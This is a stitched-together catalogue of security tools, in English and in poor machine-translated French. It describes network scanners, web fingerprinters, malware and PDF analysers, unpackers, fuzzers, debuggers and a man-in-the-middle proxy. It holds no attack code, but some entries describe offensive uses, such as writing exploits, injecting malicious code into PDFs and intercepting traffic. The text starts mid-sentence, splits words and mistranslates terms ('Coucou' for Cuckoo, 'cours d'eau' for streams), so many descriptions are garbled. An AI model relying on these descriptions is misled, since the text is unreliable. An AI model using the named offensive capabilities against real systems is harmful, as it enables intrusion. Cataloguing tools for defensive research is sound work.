also resolve host names and auto-detect your local and external IP range. uptime. browse the m using Windows Explorer. remote shutdown and sending network messages. * Retrieves currently logged-on users. * Exports results to HTML. low false positive. In addition. * You can mount and explore network resources. * Detects your internal and external IP addresses. including blind inje ction vectors.softperfect. even across routers.

Sometimes a single webpage visit contains enough information to identify a website but when it does not.com/research/whatweb WhatWeb identifies websites. ‘‘.com/ Halberd discovers HTTP load balancers.g. email addresses. or thorough but slow. RubyObject. web site administrators often install load bal ancer devices.morningstarsecurity. This is suitable for scanning public websites. called ‘passive’. It’s goal is to answer the question. web servers. login pages. and ch ecking for “/wp-content/” within relative links. a ccount ID’s. but a minority of WordPress websites remove this identifying tag but t his does not thwart WhatWeb. and more. statistic/analytics packages. It has been sponsored by Secure Network and incl udes contributions by fellow hackers. Verbose (human readable). web framework modules. To cope with heavy traffic loads. and embedded devices. The WordPress WhatWeb plugin has over 15 tests. . MagicTree. Control how many websites to scan concurrently. WhatWeb can be stealthy and fast.superadditive. For example. default installation files. whi ch include checking the favicon. MongoDB. * Recursive web spidering * Proxy support including TOR * Custom HTTP headers * Basic HTTP authentication * Control over webpage redirection * Nmap-style IP ranges * Fuzzy matching * Result certainty awareness * Custom plugins defined on the command line halberd http://halberd. When you vi sit a website in your browser. More aggressive modes were developed for in penetrati on tests. the transaction includes many hints of what web t echnologies are powering that website. “What is that Webs ite?”. is t he fastest and requires only one HTTP request of a website.VASTO is a Virtualization ASsessment TOolkit. WhatWeb can inte rrogate the website further. Whatweb http://www. Features: * Over 900 plugins * Control the trade off between speed/stealth and reliability * Plugins include example URLs * Performance tuning. JavaScript libraries. They receive HTTP requests and redirect them to the real web servers in order to share the traffic between them. Halberd is a tool aimed at discovering real servers behind virtual IPs. WhatWeb also identifies version numbers. SQL errors. It is useful for web application security auditing and for load balancer configuration testing. e. The default level of aggression. most WordPress websites can be identified by the meta HTML tag. WhatWeb has over 900 plugins. blogging platforms. These machines hide (possibly) many real web servers behind a vir tual IP. XML. WhatWeb supports an aggr ession level to control the trade off between speed and reliability. Most WhatWeb plugins are thorough and recognise a range of cues from subtle to o bvious. each to recognise something different. * Multiple log formats: Brief (greppable). WhatWeb recognises web technologies including content management systems (C MS). a collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security aud it of virtualization solutions. JSON.

0. This include hidden iframe tags. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network. * Yes. please note that this website is under construction. what operating systems (and OS versions) they are running. * Send email reports. * Ability to update the database and the program easily from dedicated server. and official binary packages are avalable for Linux. and monitoring host or service uptime. Newer version also presents unique 'Port Finder' fe ature which makes it easy to search for particular port in all running process w ith just one click.org/ Nmap ("Network Mapper") is a free and open source (license) utility for network exploration or security auditing.isecur1ty. Many systems and network administrators also f ind it useful for tasks such as network inventory. and Ma c OS X. check it later for updates.iScanner http://iscanner. a nd dozens of other characteristics. It displays all open network ports (TCP/UDP) and active ne twork connections for each process. managing service upgrade sche dules.com/procnetmonitor. nmapsi4 http://code. Current Features: * Detect malicious codes in web pages. in order to management all options of this powerful se curity net scanner! procnetmonitor http://securityxploded. it's FREE!! nmap http://nmap.com/p/nmapsi4/ NmapSi4 is a complete Qt4-based Gui with the design goals to provide a complete nmap interface for Users. activex objects and PHP codes . Nmap runs on all major computer operati ng systems. It was designed to rapidly scan large networ ks. what services (applic ation name and version) those hosts are offering. javascri pt. This tool is programmed by iSecur1ty using Ruby programming language and it's re leased under the terms of GNU Affero General Public License 3. what type of packet filters/firewalls are in use. Windows. * Extensive log shows the infected files and the malicious code. but works fine against single hosts.php ProcNetMonitor is the free tool to monitor the network activity of all running p rocess in the system. * Fast scanner with good performance. * Simple and editable signature based database. * Very flexible options and easy to use. It has advanced color based auto analysis sy stem to make it easy to distinguish network oriented processes from others with just one glance at the list.org/ iScanner is free open source tool lets you detect and remove malicious codes and web pages viruses from your Linux/Unix server easily and automatically. vbscript. All these features combined together make it very effective tool in combating th . It also comes with export feature to save the entire process -port list to standard HTML file for offline analysis.google. * Ability to clean the infected web pages automatically. * Easy backup and restore system for the infected files.

org/index. le pot de miel peut j ouer un rôle dans l'ajustement en temps réel des politiques de sécurité de domaine de l' entreprise où elle est déployée. Il est capable de retourner des rapports détaillés sur les appels clé API et de l'activité réseau. Les scripts configurables par l'utilisateur permettent à l'administrateur de d onner Artemisa la puissance suffisante pour ajuster les politiques de domaine en temps réel. and PDF files.e Trojans and Spywares installed on the system which continuously send keyboard strokes. * Trace pertinentes des appels d'API d'analyse comportementale. Normalement. depuis le pot de miel ne représente pas un être humain. L'analyse implique l'utilisation de différentes techniques et outils tiers afin de déterminer et de qualifier la nature du message. Artemisa devrait fonctionner comme un agent utilisateur classique d'un VoIP / SI P de domaine.org/ Coucou est une solution légère qui effectue automatisé d'analyse dynamique des binaire s Windows fourni. comme la course scrits configurable par l'utilisateur et l'envoi d'un rapport sur l'e-ma il.net/projects/artemisa/ Artemisa est un logiciel libre de VoIP / SIP honeypot logiciels spécifiques conçus p our se connecter à un domaine d'entreprise VoIP comme un backend user-agent afin d e détecter une activité malveillante à un stade précoce. .com/translate/sound_player2. Ainsi. Coucou http://www. JavaScript.iseclab. ce qui est suggéré de le faire sur une machine séparée ou à la machine virtuelle.cuckoobox.com/ wepawet http://wepawet.urlvoid.swf Catalogue des outils Analyse Artemisa http://sourceforge. il continue d'écouter et d'attente pour l'activité SIP. les rapports Artemisa que de plusieurs façons. Lorsque le message est classé et u ne conclusion est obtenue. Le serveur d'enregistrement SIP du domaine doit être également configuré pour laisser Artemisa être enregistrées avec un ensemble d'extensions (par exemple 5 extensions d e 401 à 405). on s'attend pas à voir l'activité SIP sur le pot de miel. comme un appel. il fournit des fichiers de configuration modulair e où l'administrateur peut configurer les paramètres de connexion ainsi que le compo rtement de l'Artemisa de. tout appel ou un message qui atteignent le pot de miel est suspect et est analysée.gstatic. Une fois Artemisa est configuré et lancé. En outre. online account data and other sensitive information to remote server. It currently handles Flash. Pour y parvenir. Websites URLvoid http://www. Traduction (anglais > français) http://www.Caractéristiques actuelles sont les suivantes: * Récupérer les fichiers à partir d'URL à distance et de les analyser.php Wepawet is a service for detecting and analyzing web-based malware.

Surtout en analysant les correctif s de sécurité vous pouvez creuser dans les détails de la vulnérabilité c'est de fixation. Il a des règles prédéfinies pour numériser DOM . Il a prolongé été déployés r Tier-1 FAI à l'échelle mondiale couramment pour protéger leurs clients en aval. les dolines sont couramment déployés pour offrir de précieux renseignements concernant les menaces de sécurité de leurs réseaux so nt confrontés.darknets et honeyne ts et comment vous pouvez les utiliser éventuellement pour obtenir des faits impor tants concernant les menaces et les erreurs de configuration de votre réseau. tout comme l'analyse.html?storyid=9037 Un gouffre est définie comme un processus dans lequel nous rediriger réseau IP spécifi que des visiteurs ciblés pour une variété de facteurs de sécurité. On peut exécuter l'analyse sur les DOM existants et chercher les points d'entrée i ntéressante et appels. Il a été écrit en utilisant la méthode st andard de l'écriture d'extensions en utilisant la plate-forme XUL et le langage Ja vaScript dans la majorité.* * * * * * Surveiller les processus de manière récursive naissains. Prendre des captures d'écran en cours d'exécution.sans.edu/diary. DOMScan http://blueinfy. Logiciel d'analyse de soutien personnalisé basé sur les scripts AutoIt3.html DOMScan est un utilitaire pour disque IE et de capturer en temps réel DOM à partir d u navigateur. L'uti lisation de ce seul utilitaire permet d'identifier les vulnérabilités suivantes. . DarunGrim est un outil diffing libre qui offre des fonctionnalités diffing binaire. On peut observer les DOM en détail à l'aide de cet utilitaire. DarunGrim http://www. • XSS DOM sur la base • DOM sur la base des appels vulnérables • Source d'abus et de méthodes de chargement de contenu externe logique • DOM possibles et la couche d'affaires appels • même origine des appels de contournement et de l'utilisation • Mashup utilisation à l'intérieur DOM • Widget examen de l'architecture en utilisant l'outil DOMTracer http://blueinfy. l'analyse d'exécution des DOM / JavaScript est vitale et une aides d'examiner les appels effectués au cours de la «manipulation dynamique DOM.darungrim. Il permet de tracer à travers des variables JavaScript. Exécuter une analyse concomitante sur plusieurs machines.org/ DarunGrim est un outil de comparer des binaires.html DOMTracer . Le DOMTr acer est une extension Firefox pour le même but.com/tools. Intercept téléchargé et les fichiers supprimés. Le trafic réseau généré Dump.com/tools. diffing binaire est une technique puissante pour la rétro-ingénierie correctifs publ iés par les éditeurs de logiciels comme Microsoft. comm ent jamais pour les administrateurs réseau. Lisez la suite ci-dessous pour des faits supplémentaires sur dolines ainsi que le couple a de sortes de mise en œuvre des dolines . Ceci est en version bêta et nous travaillons sur de nouve lles fonctionnalités.Firefox Plugin (trace les appels DOM et JavaScript) # Les DOM comme on le voit dans tous les cas ci-dessus doit être analysé dans de nom breux aspects. l e détournement des attaques et la détection d'activités anormales. DNS Sinkhole http://isc. Il donne accès à DOM contexte actif avec JavaScript.

aller en profondeur dans la struct ure du document. compressés ou cryptés avec les programmes knowns très bien la protection des logiciels comme UPX. ACProtect. fixer la RAI. Caractéristiques * Créez des documents PDF à partir de zéro. Ce n'est pas une bibliothèque de rendu PDF.FSG. et c L'interface graphique a été conçu en utilisant RadASM et MASM. En outre. il est suffisamment puissant pour être utilisé à cet effet de chas se des vulnérabilités. sorti en 2006 et il est largement u tilisé par les chercheurs pour identifier les vulnérabilités de sécurité. Également que l'information peut vous aider à écrire des codes de protection pour les vulnérabilités spécifiques. etc Vous pouvez développer un plugin pour FUU d'une manière très facile à utiliser TitanEngine. décompresser et déc rypter la plupart des programmes de repas.Maintenant. FUU comprennent des outils supplémentaires comme: * * * * Finder OEP générique Détecteur Signature Cryto Unpacker générique Signatures Detector (prochaine version) Fileformats Origami http://security-labs. signatur . Il est également utilisé pour écrire des exploits de 1 jour par les auteurs de logiciels malveillants ou des chercheurs en sécurité. décompression objet PDF ruisseaux et desobfuscating noms et des c ordes.Vous pouvez utiliser cette information pour savoir ce qui cause la rupture de lo giciels. DarunGrim2 est beaucoup plus rapide que l'original Darun Grim. Pas comme d'autres fournisseurs qu'ils ne rejettent patch régulièreme nt et les vulnérabilités patché sont relativement concentrés dans de petites zones dans le code. il peut être utilisé pour créer sur la volée au format PDF personnalisés. telles que le chiffrement / déchiffrement. ou pour injecter (mal) en code documen ts déjà existants.google. je suis libérant DarunGrim2 qui est un C + + port de codes python original. Il vise à fournir un outil de script pour générer et analyser un fichier PDF malicieux. Faster Unpacker Universal http://code. cette aide au développeur d'écrire des plugins très facile et très rapide sans a voir à se préoccuper de certaines fonctions répétitives et ennuyeuses comme dump. Cette technique diffing binaire est particulièrement utile pour les fichiers binai res Microsoft. Il ya un "eEye Binary diffing Suites". * Les opérations de haut niveau. les modifier et les recompiler. Le noyau de chaque plugin SDK de l'utilisation TitanEngine ReversingLabs sous le capot.org/origami/ l'origami est un cadre conçu pour analyser Ruby. * Analyse des documents existants. Ce qui fait la part patché plus visible et évident pour les analyseurs de p atch. ajouter des sections.Chaque plugin inclus dan s la version officielle a été écrit en utilisant ASM MASM. * Découvrez des documents au niveau de l'objet. analyser et établir des documents P DF. En outre. Même si il est gra tuit et opensource. ASPack.com/p/fuu/ FUU (plus rapide universelle Unpacker) est une interface graphique Windows outil avec un ensemble d'outils (plugins) pour vous aider à décompresser.

e. Des outils spécialisés qui traitent de code JavaScript obscu rcie.) Via des plugins et ajoute des fonctionnalités d'automatisation vi a des scripts VBS différents.. * Base de JavaScript-obsfuscator * Peut cacher: en-tête que les cours d'eau. En term es d'analyse shellcode.. il dispose d'une interface intégrée pour sctest libemu.-à-plusieurs filtres appliqués à un même flux) * Supporte unescaping têtes pdf codé * Interface scriptable pour traiter plusieurs fichiers et générer des rapports * Voir tous les objets pdf * Voir dégonflé les cours d'eau * Voir les détails flux telles que les compensations de fichiers. scripts d'automatisation en cours: . le faible niveau d'en-tête et le lecteur PDF objet sont disponibles. tout en étant capable de décoder les chaînes de filtre (plusieurs filtres appliqués à l 'objet même flux. pièces jointes .php?uid=7&pid=57 PDF Stream Dumper est un outil gratuit qui aide à l'analyse des documents PDF mali cieux.iTextSharp utilise et requiert Net Framework 2. une mise à jour de construire SCLOG iDefense. certains flux * JS interface utilisateur a également accès à une classe de boîte à outils o simplifier les chaînes fragmenté o les fichiers en lecture / écriture o ne hexdumps o ne décode unicode sécurité moteur désassembleur o o reproduire certaines communes Adobe API (nouveau) PDF Stream Dumper soutient également unescaping / mise manipulé en-têtes de fichier PD F. ainsi qu'un moteur de refactorisation assez stable qui va analyser un script et remplacer les noms de toutes les fonctions screwy aléatoire et variable avec l ogique versions expurgées pour une meilleure lisibilité sont également disponibles. Il a aussi quelques fonctionnalités qui peuvent le rendre utile pour le dével oppement vulnérabilité PDF. LZWDecode * Des outils intégrés shellcode: o gui SCLOG (Shellcode outil d'analyse) o libemu scdbg outil d'analyse basé Shellcode o fonctionnalité Shellcode_2_Exe o Export unescaped octets de fichier * Prend en charge le chaînage de filtre (c. ASCII85Decode. * Une interface GTK pour naviguer rapidement dans le contenu du document. ASCIIHEXDecode. double flux. PDFStreamDumper http://sandsprite. RunLengthDecode. Liste complète des fonctionnalités * Filtres supportés: FlateDecode. d'en-tête. etc * Enregistrer les données brutes et dégonflé * Recherche flux pour les chaînes * Scan pour les fonctions qui contiennent des exploits pdf (dumb scan) * Js javascript en forme en utilisant beautifier (voir les crédits dans le fichier README) * Voir le cours d'eau comme des dumps hexa * Zlib compresser / décompresser des fichiers arbitraires * Remplacer / mise à jour des flux pdf avec vos propres données * Basic interface JavaScript afin de pouvoir exécuter les parties de scripts intégrés * PdfDecryptor w / source . et une fonction shellcode_2_exe. des out ils JavaScript comprennent l'intégration avec JS-Beautifier pour le formatage du c ode.0. la possibilité d'exécuter des portions du script vivre pour vivre de-faux-fuyan ts.com/blogs/index.

qui ont des filtres non pris en charge * Filter_chains.csv builds avec les résultats de la barre de statut inférieur pour tous les fichiers dans un répertoire * Pdfbox_extract. ce qui rend l'optimisation de grands projets plus à l'aise.scanner un répertoire et établir une liste de tous les f ichiers PDF.scanne récursivement répertoire parent pour les fichiers PDF q ui utilisent des filtres d'encodage sur un flux. Macro OLE2 Scan. SQLite Support. Flare peut répondre à vos besoins.blogspot. swfmill http://www.de/flasm. Répertoire scan fonctionne aussi.com/2010/08/malicious-office-files-analysis Lire la suite . UTILISATION: _suspect_document pyOLEScanner. Toutefois. 5.py python Compatibilité avec Windows et Linux est maintenu. Plus Shellcode détection.vbs .vbs . Si vous êtes à la recherche d'un déco mpilateur. flasm http://www.3 contient: 1. Vous pouvez également faire quelques optim isations sur le code désassemblé à la main ou ajuster le code que vous le souhaitez.com / Evilcry / scripts Python PyOLEScanner . ce qui améliore vos compétences ActionScript. Office2007 (docx / pptx / xlsx) vérifie dégonfler et Macro. 3. En rega rdant le démontage.nowrap. * Obsfuscated_headers. vous apprendrez comment fonctionne le compilateur de Flash.html Flasm désassemble votre SWF entier. Qu'est-ce que vous obtenez est la représentation l isible de bytecode SWF. 2. pas source ActionScript.analyser tous les flux décompressé dans tous les fichiers dans u n répertoire pour une chaîne que vous saisissez * Unsupported_filters.vbs . en présence de chiffrement un «déchiffré» exemplaire. Correction d'un bug..vbs .vbs .vbs .utilise PDFBox pour extraire des données de page dans des fichiers individuels PyOLEScanner https: / / github. 6.swfmill.* Csv_stats.PDFBox utiliser pour extraire toutes les images et le tex te d'un fichier actif * String_scan.. 4. Il est également possible d'intégrer des actions flasm dans votre code ActionScript. Flare ne peut pas modifier le fichier SWF.vbs . F lasm applique ensuite les modifications apportées à l'original SWF.org/ Son utilisation la plus courante est la génération de bibliothèques de ressources cont .scanne récursivement répertoire parent pour les fichiers PDF qui ont obsfuscated têtes objet * Pdfbox_extract_text_page_by_page. Flasm n'est pas un décompilateur. pour plus d'informations de fond Version 1.malveillant de détection de fichiers Office http://evilcodecave. Plus d'API de détection. en remplacement des actions originales. y compris tous les délais et les événements.

l'ajout d'une quantité considérable de nouvelles fonctionnalités par rapport aux versions antérieures.5. JPEG.NET Framework 3. * Voir et comparer des ensembles complets de paramètres capturés sur différents ordina teurs ou sur un seul ordinateur dans le temps (par exemple. Il est particulièrement utile sur les systèmes contrôlés par la stratégie de groupe. * Construit autour d'un XSLT / processeur EXSLT (libxslt) * Entrée et de sortie de la transformation XSLT peut être soit XML ou binaire SWF * les commandes XSLT pour l'importation de PNG.IEZoneAnalyzer version 3 représente une réécritur e totale. Steve Webster et d'autres. * Comparez les paramètres entre deux ou plusieurs zones de sécurité ou de modèles.justanotherhacker. Version 1.technet. Graudit http://www.il suffit d'exécute r l'utilitaire directement. les polices (TTF) ou d'autres films SWF pour une utilisation avec MTASC ou haXe compilé ActionScript. pour déterminer si un système a dévié de ses réglages de base). mais est maintenant mis à jour par Daniel Cassidy . Il est comparable à d'autres applications d'analyse statique comme d es rats. Il comprend des contributions substantielles par Ralf Fuest. * Comparaison des résultats du filtre pour voir seulement les différences ou les con .IEZoneAnalyzer ne require. Il n'a pas non plus un programme d'installation .enant des images (PNG et JPEG). et pour la car tographie SWF numéros d'identification * Built-in "dialecte simple" pour soutenir la création et le renforcement des fond s souverains bibliothèque simple swfmill a été écrit par Daniel Turing.com/b/fdcc/archive/2011/04/14/iezoneanalyzer-v3.aspx IEZoneAnalyzer est un utilitaire pour visualiser et comparer les paramètres d'Inte rnet Explorer zone de sécurité.html Graudit est un script simple et ensembles de signature qui vous permet de trouve r des failles de sécurité potentielles dans le code source en utilisant l'utilitaire grep de GNU. à laquelle la norme de sécurité boîte de dialogue des paramètres ne permet pas l'affichage des paramètres. * Résultats à l'exportation vers Excel ou vers un fichier texte Comma Separated Valu es (CSV).com/projects/graudit/download. bien swfmill peut être utilisé p our produire à la fois des structures simples et complexes SWF .8 *-L 'opérateur ne vim numéros de ligne convivial Man pages * et mises à jour de documentation * Mises à jour la signature PHP * Mises à jour la signature JSP * Mises à jour la signature Dotnet * Mises à jour la signature Perl et corrections de bugs * Mises à jour la signature Python Bug * aux correctifs pour / scripts Plus * aux / scripts * Correction d'ignorer les répertoires CVS par défaut IEZoneAnalyzer http://blogs. et vice-SWAAT viseur. Notez que IEZoneAnalyzer ne nécessite pas de droits d'adm inistration. SWF et TTF. Les principales caractéristiques de IEZoneAnalyzer: * Voir les paramètres de zone de sécurité efficace pour toute la zone de sécurité sur l'or dinateur local ou exportées à partir d'un ordinateur distant et d'identifier si chaq ue paramètre a été créé par la politique.

réorganiser et redimensionner les colonnes du résultat. évaluer les applications Web mobile délicate. INetSim http://www. La machine passerelle aura au moins une interface WAN qui a .com/products-immdbg. et un grand et bien pris en charge l'API Python pour l'extensibilité facile.immunityinc. Mallory est un extensible TCP / UDP homme dans le mil ieu proxy qui est conçu pour être exécuté en tant que passerelle. En termes plus techniques. L a configuration idéale pour Mallory est d'avoir une «LAN» ou «victime» que Mallory réseau ag it en tant que passerelle pour. Il s'ap puie sur une interface utilisateur graphique solides avec la fonction. -Un débogueur avec des fonctionnalités conçues spécifiquement pour l'industrie de la sécur ité -Morceaux d'exploiter le temps de développement de 50% -Simple. Modules pour la simulation des services suivants sont inclus: * * * * * * * * * * * * HTTP / HTTPS SMTP / SMTPS POP3 / POP3S DNS FTP / FTPS TFTP IRC NTP Ident Finger Syslog Dummy. Immunité Debugger http://www. ou peut-être il suffit de tirer une blague à votre ami. L'objectif est pour l'homme dans le milieu de la circulation des fins de test. Il peut être utilisé pour obtenir lors de ces difficiles à intercepter des flux réseaux.inetsim. d'une par t de l'industrie l'outil d'analyse tas construit spécifiquement pour la création du tas.html L'objectif du projet INetSim est d'effectuer une analyse rapide d'exécution du com portement du réseau des échantillons de logiciels malveillants inconnus dans un envi ronnement de laboratoire. Les machines virtuel les victime puis configure la machine Mallory que la passerelle par régler manuell ement sa passerelle.org/index.com/insight/mallory/ Mallory est un transparent TCP et UDP proxy. Cela peut être configuré dans un environnement de ma chines utilisant des interfaces d'accueil virtal seul réseau.flits. * Copie sélectionné ou tous les résultats dans le presse papier. compréhensible interfaces -Robuste et puissant langage de script pour automatiser le débogage intelligent -Léger et rapide mise au point pour prévenir la corruption lors de l'analyse complex e -Une connexion à fuzzers et d'exploiter les outils de développement Mallory http://intrepidusgroup. analyser l es programmes malveillants.shtml Immunité Debugger est un nouveau moyen puissant pour écrire des exploits. * Trier. et d'inverser les fichiers binaires ingénieur.

com/procnetmonitor. . fai t un peu de nettoyage des données. Structure des dossiers * Ca . Les exportations de la fonctionnalité d'exportation en utilisant les données figuran t dans la liste des résultats.com/downloads/en/details. etc servic e il est donc facile de forer vers le bas pour des informations spécifiques.autorité de certification fichiers. scripts exclus peuvent êt re rajoutés à tout moment en utilisant la fenêtre Options.uk/networkscanviewer/ NetworkScanViewer est une application graphique conçu pour aider afficher les résult ats de nessus (v4) et nmap (v5) les résultats d'analyse. Le réseau victime utilise ensuite la passerelle Mallory pou r acheminer le trafic. comme hôte.où le code des vies * Les scripts . Il est également possible d'exclure de ma nière permanente scripts qui vient de générer du bruit par un clic droit sur l'élément et en sélectionnant "Ignorer Plugin" dans le menu contextuel. Il affiche tous les ports d'un réseau ouvert (TCP / UDP) et les connexions réseau actives pour chaque processus.scripts utilisés pour configurer l'environnement de mallory Fuzzer fichier MiniFuzz http://www.répertoire où sont stockées toutes les données des fichiers mallory mallory * .certs MiTM qui sont créés à la volée * Db .microsoft. le port. Caractéristiques * * * * * Le nettoyage des données Exporter au format CSV et XML Sortable colonnes de données Filtrage des données Script exclusion ProcNetMonitor http://securityxploded. puis affiche les résultats sur la liste des résulta ts.aspx?FamilyID=B2307CA4-638F-4641-9 946-DC0A5ABE8513 & 3bdisplaylang% = fr & pf = true MiniFuzz est un outil de test de base conçu pour aider à détecter les failles du code qui peut exposer les failles de sécurité dans le code de gestion des fichiers. NetworkScanViewer http://www.ccorde l'accès Internet. donc si vous changez l'ordre de tri ou filtrer les résultats. y compris la clé privée de Mallory * Certs .co.woany. Cet o util crée de multiples variations aléatoires du contenu du fichier et il se nourrit de l'application pour tester le code dans une tentative d'exposer le comportemen t des applications inattendues et potentiellement dangereux. Le chargement de l'application de l'analyse des données de nessus et nmap XML. Les données de la liste peut être triée en cliquant sur les en-têtes de colonnes. il est facile de commander et de trouver de l'information notamment. il se reflète dans l'exportation. Il ya aussi l a possibilité de filtrer des informations spécifiques.php ProcNetMonitor est l'outil gratuit pour surveiller l'activité réseau de tous les pro cessus en cours dans le système. Il combine les fonctionna lités des deux NessusViewer et NmapViewer. Il a avancé la couleur système basé analyse automatique pour le rendre facile de distinguer les processus réseau orienté des autres avec un seul coup d'œil sur la liste.répertoire vide * Src .

. La sortie peut être imprimé avec soin sur la ligne de commande ou en format délimité par des tabulations..com/p/sqlinject-finder/ Brève description ¶ Simple script python qui analyse à travers un pcap et se penche sur l'EEG et des d onnées requête POST pour suspectes et SQL injecte possible. il devient impératif pour la rétro-ingénierie pour tester les logiciels malveillants dans le temps mis à leur disposition. Comme malwares s'équiper avec les nouvelles techniques. vous pouvez avoir to ut cela automatisé. les auteurs de malwares sont de plus en plus intelligents et ont réussi à trouver des moyens d'échapper à un logiciel de sécurité.reversinglabs.32 bits et 64 bits formats sont s upportés! Il peut être utilisé pour créer tous les types connus de déballeurs. Ses fonctio ns sont les suivantes: * SDK a 250 fonctions documentées * Automatisation facile de tous les outils de renverser * Prend en charge x86 et x64 * Possibilité de créer: statique.com/products/TitanEngine. Il peut également être utilisé pour fabriquer de nouveaux outils qui fonctionnent avec des fichiers PE! Les deux .. La sortie comprend: * * * * L'adresse IP suspectes La page Web attaqué Le paramètre et la valeur utilisée Le numéro de châssis du paquet dans le pcap (peut être utilisé pour trouver exactement où le paquet est dans Wireshark) * La raison pour laquelle la demande a été signalée TitanEngine http://www. La seule chose entre une " propre" machine et les logiciels malveillants est un analyseur de désosser les log iciels malveillants /.google. Des outils comme TitanEngine va sûrement nous aide r dans notre analyse de logiciels malveillants et les efforts d'ingénierie inverse ! Il est l'un des outils que nous avons été en attente pour le téléchargement depuis le moment où il a été annoncé lors de la BlackHat 09! TitanEngine est livré OPEN SOURCE cadre de la Labs réversibles qui peuvent être utilisés pour effectuer plus de 250 fonctions! Le meilleur de tous. inspecteur du noyau Tuluka .php Avec le temps. dynamique et générique déballeurs * Testé sur plus de 150 déballeurs * C'est gratuit et open source LGPL3! * Intégré x86/x64 débogueur * Intégré x86/x64 désassembleur * Dumper la mémoire intégrée traceur import * intégré et du fixateur * Fixateur de réinstallation intégré * Realigner de fichiers intégré * Fonctions de travailler avec TLS.Il présente également des caractéristiques uniques »Port Finder" de chercher facilement le port particulier dans tous les processus en cours avec un seul clic. SQLInject Finder http://code. Règles pour contrôler l'inje ction SQL peuvent être facilement ajoutés. ressources. les exportations. Il est éga lement livré avec fonction d'exportation pour enregistrer la liste complète des proc essus de port à un fichier HTML standard pour l'analyse hors-ligne.

Cela peut être particulièrement utile lo rsque vous traitez avec des malwares ou de tenter d'inverser certaines applicati ons ingénieur.. Reverse Engineering par diapositives Crayon de la Blackhat parler. même si la lecture de ces reg istres est contrôlée par une personne * Permet de trouver le module du système de l'adresse dans ce module * Permet d'afficher le contenu de la mémoire du noyau et de l'enregistrer sur le d isque * Vous permet d'enregistrer les pilotes du noyau et des modules principaux de to us les processus * Permet de mettre fin à tout processus * Est capable de dissasemble gestionnaires d'interruption et de la CEI.offensivecomputing.offensivecomputing.gtisc. les serv ices système.org/index.html uluka est un nouvel outil puissant (antirootkit).fr/winapioverride32/ WinAPIOverride32 est une source ouverte et un logiciel avancé de surveillance API pour les systèmes d'exploitation Windows. les conducteurs et les dispositifs * Détecte les IRP crochets * Identifie la substitution de certains champs dans la structure DRIVER_OBJECT * signatures pilote vérifie * Détecte et restaure SSDT crochets * Détecte les descripteurs de suspect dans GDT * De détection de décrochage IDT * De détection de décrochage SYSENTER * Affiche la liste des threads du système et vous permet de les suspendre * API et de détection de décrochage en ligne * Indique les valeurs réelles des registres de débogage.gatech.http://www. qui a les caractéristiques suiva ntes: * Détecte les processus cachés.net/?q=node/1316 VERA. Affiche les informations ci-dessus indiqué dans l'interface graphique pour l'utili sateur de voir et sans doute d'utiliser ces informations pour l'analyse Vera http://www. Vous pouvez l'utiliser pour surveiller e t / ou remplacer toute fonction d'un processus! Vous pouvez le faire pour les fo nctions API ou exécutable fonctions internes..net/?q=node/1379 WinAPIOverride32 http://jacquelin. le programme de l'ingénierie inverse de visualisation basé sur le projet Ether .free. routines début de threads du système et beaucoup plus * Permet de construire la pile pour appareil sélectionné * Beaucoup plus ..net/bhusa2009/oc-reversing-by-crayon-bhusa . http://www.tuluka.edu/ http://www. Analyse Malware via les extensions de virtualisation matérielle: Ether http://ether.potier.offensivecomputing. Quelques-unes des fonctions WinAPIOverride32 sont les suivants: * Vous pouvez définir des filtres sur les paramètres ou de résultat de la fonction * Vous pouvez définir des filtres sur les dll de rejeter les appels de Windows DLL système * Vous pouvez fonctions crochet à l'intérieur du processus cible non seulement API .

l'analyse binaire fournit la réalité de terrain sur le comportement du programme pui sque les ordinateurs d'exécuter des binaires (exécutables). Chaque descri ption comprend un ensemble de cordes et une expression booléenne qui détermine sa lo gique bitblaze http://bitblaze. En outre. l'analyse binaire est difficile en raison de l'absence de la sémantique de niveau supérieur. Avec YARA vous pouvez c réer des descriptions de familles de logiciels malveillants en fonction des modèles textuels ou binaires contenues sur des échantillons de ces familles.com/fwlink/?Li nkID=140109 La fonctionnalité de base de l'outil de l'état du système Analyzer est de vous permett re de comparer deux photos prises à différents points dans le temps. vous au rez besoin de télécharger les pochettes d'information pour obtenir le système d'État Ana lyzer.De nombreuses techniques de niveau supérieur sont souvent insuffisa nts pour l'analyse. et le binaire peut même être masquée. et il peut directement appeler des fonctions de l'application ciblée. permettant des modifications de la mémoire ou des registres.Par conséquent. Ainsi. I l s'agit d'une application merveilleuse source ouverte. pas de code source.com/p/yara-project/ Yara est un outil visant à aider les chercheurs à identifier les logiciels malveilla nts et classer des échantillons de logiciels malveillants.edu/ analyse binaire est impératif de protection des COTS (commune hors-the-shelf) et l 'analyse des programmes et se défendre contre la multitude de codes malveillants.cs.com/fwlink/?LinkID=140110 http://go. Cela vous perme t de comparer l'état d'une machine à la fois avant et après une demande d'installation ou probablement vous pouvez l'utiliser dans votre VM comme une première étape dans l'analyse des logiciels malveillants ou ingénierie inverse Cet outil est une partie de la Windows 2008 R2 Logo de certification de logiciel s et Windows 2008 R2 Logo Logiciel outils de certification. Cepe ndant. Vous pouvez aussi "casser" une application ciblée ava nt ou après un appel de fonction. et encore moins binaires potentiellement malveillants. struct et syndicat) et l'utilisateur définit son t pris en charge * Tout est est fait comme modules: vous pouvez vous connecter ou de remplacer de façon indépendante pour toute fonction * Open Source * Une bibliothèque est prévue pour les développeurs qui ont l'intention de construire un logiciel de leur accrochage WinAPIOverride32 tente de combler le fossé entre les logiciels classiques de surve illance API et les débogueurs.microsoft.microsoft. Yara http://code.google.* Vous pouvez brancher asm fonctions avec les paramètres passés à travers les registre s * Vous pouvez exceptions matériel et des logiciels crochet * Double résultats et le flotteur sont enregistrés * Vous pouvez facilement remplacer une API ou tout autre procédé fonction interne * Vous pouvez casser processus avant et / ou après appel à la fonction de mémoire à chan gement ou des registres * Vous pouvez appeler des fonctions qui sont à l'intérieur du processus distants * Peut interfaces COM crochet OLE et ActiveX Les types d'utilisateurs * (enum. écrit en C + +. Analyseur de l'état du système Windows http://go. nous avons besoin de développer des outils et techniques qui . même bénigne binaires. où le code source n'est pas disponible.berkeley.

